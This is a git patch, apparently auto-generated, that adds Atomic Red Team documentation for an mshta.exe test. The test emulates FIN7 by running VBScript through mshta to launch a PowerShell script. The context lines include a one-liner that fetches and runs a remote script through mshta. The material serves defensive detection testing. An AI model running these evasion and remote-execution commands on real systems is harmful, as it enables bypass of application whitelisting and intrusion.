From 87d70d2ef3d5346487fcd87ee41a6cb4f60f9f84 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 7 Nov 2019 21:11:20 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/T1170/T1170.md   | 25 +++++++++++++++++++++++++
 atomics/index.md         |  2 ++
 atomics/index.yaml       | 36 ++++++++++++++++++++++++++++++++++++
 atomics/windows-index.md |  2 ++
 4 files changed, 65 insertions(+)

diff --git a/atomics/T1170/T1170.md b/atomics/T1170/T1170.md
index a693c919..6583ade6 100644
--- a/atomics/T1170/T1170.md
+++ b/atomics/T1170/T1170.md
@@ -14,6 +14,8 @@ Mshta.exe can be used to bypass application whitelisting solutions that do not a
 
 - [Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject](#atomic-test-1---mshta-executes-javascript-scheme-fetch-remote-payload-with-getobject)
 
+- [Atomic Test #2 - Mshta executes VBScript to execute malicious code](#atomic-test-2---mshta-executes-vbscript-to-execute-malicious-code)
+
 
 <br/>
 
@@ -35,4 +37,27 @@ mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Mshta executes VBScript to execute malicious code
+Run a local VB script to run local user enumeration powershell command
+
+This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| atomics_path | path to atomics folder | path | ..\..\atomics|
+
+#### Run it with `command_prompt`! 
+```
+mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+```
+
+
+
 <br/>
diff --git a/atomics/index.md b/atomics/index.md
index f534c50f..79a24944 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -296,6 +296,7 @@
   - Atomic Test #4: Modify registry to store logon credentials [windows]
 - [T1170 Mshta](./T1170/T1170.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
+  - Atomic Test #2: Mshta executes VBScript to execute malicious code [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)
   - Atomic Test #1: Alternate Data Streams (ADS) [windows]
 - [T1126 Network Share Connection Removal](./T1126/T1126.md)
@@ -667,6 +668,7 @@
   - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
 - [T1170 Mshta](./T1170/T1170.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
+  - Atomic Test #2: Mshta executes VBScript to execute malicious code [windows]
 - [T1086 PowerShell](./T1086/T1086.md)
   - Atomic Test #1: Mimikatz [windows]
   - Atomic Test #2: BloodHound [windows]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 549441b3..5ce269b3 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -8827,6 +8827,24 @@ defense-evasion:
         elevation_required: false
         command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
 
+'
+    - name: Mshta executes VBScript to execute malicious code
+      description: |
+        Run a local VB script to run local user enumeration powershell command
+
+        This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
+      supported_platforms:
+      - windows
+      input_arguments:
+        atomics_path:
+          description: path to atomics folder
+          type: path
+          default: "..\\..\\atomics"
+      executor:
+        name: command_prompt
+        command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
+          -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
 '
   T1096:
     technique:
@@ -19152,6 +19170,24 @@ execution:
         elevation_required: false
         command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
 
+'
+    - name: Mshta executes VBScript to execute malicious code
+      description: |
+        Run a local VB script to run local user enumeration powershell command
+
+        This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
+      supported_platforms:
+      - windows
+      input_arguments:
+        atomics_path:
+          description: path to atomics folder
+          type: path
+          default: "..\\..\\atomics"
+      executor:
+        name: command_prompt
+        command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
+          -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
 '
   T1086:
     technique:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 616f245b..677d5a88 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -96,6 +96,7 @@
   - Atomic Test #4: Modify registry to store logon credentials [windows]
 - [T1170 Mshta](./T1170/T1170.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
+  - Atomic Test #2: Mshta executes VBScript to execute malicious code [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)
   - Atomic Test #1: Alternate Data Streams (ADS) [windows]
 - [T1126 Network Share Connection Removal](./T1126/T1126.md)
@@ -530,6 +531,7 @@
 - T1177 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1170 Mshta](./T1170/T1170.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
+  - Atomic Test #2: Mshta executes VBScript to execute malicious code [windows]
 - [T1086 PowerShell](./T1086/T1086.md)
   - Atomic Test #1: Mimikatz [windows]
   - Atomic Test #2: BloodHound [windows]